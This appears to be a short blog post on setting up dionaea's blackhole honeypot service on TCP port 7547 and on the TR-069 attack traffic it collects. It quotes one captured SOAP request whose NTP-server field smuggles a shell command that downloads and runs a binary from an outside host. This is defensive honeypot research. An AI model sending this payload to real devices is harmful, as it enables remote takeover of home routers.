Since dionaea version 0.6 a new service called blackhole is available in dionaea. It can simulate a very basic service listining on a specified port and collect data submitted to the honeypot. To enable the service get dionaea version 0.6 or later and edit or create a config file in the services-enabled directory with the following content.
- name: blackhole config: services: # TR-069 - port: 7547 protocol: tcp
Restart dionaea and it will start to listen on tcp port 7547. At the time of writing you should see the first attacks within a very short period of time.
In the example below you can see the data captured by dionaea a few seconds after the restart. The XML data has been reformatted to be more readable.
POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body> </SOAP-ENV:Envelope>
I was able to capture 6 different addresses within a few minutes.
Some requests don't have a shell command but it seems if they have some additional exploit code attached at the end.
The Internet Storm Center has collected some additional information about the Port 7547 SOAP Remote Code Execution Attack Against DSL Modems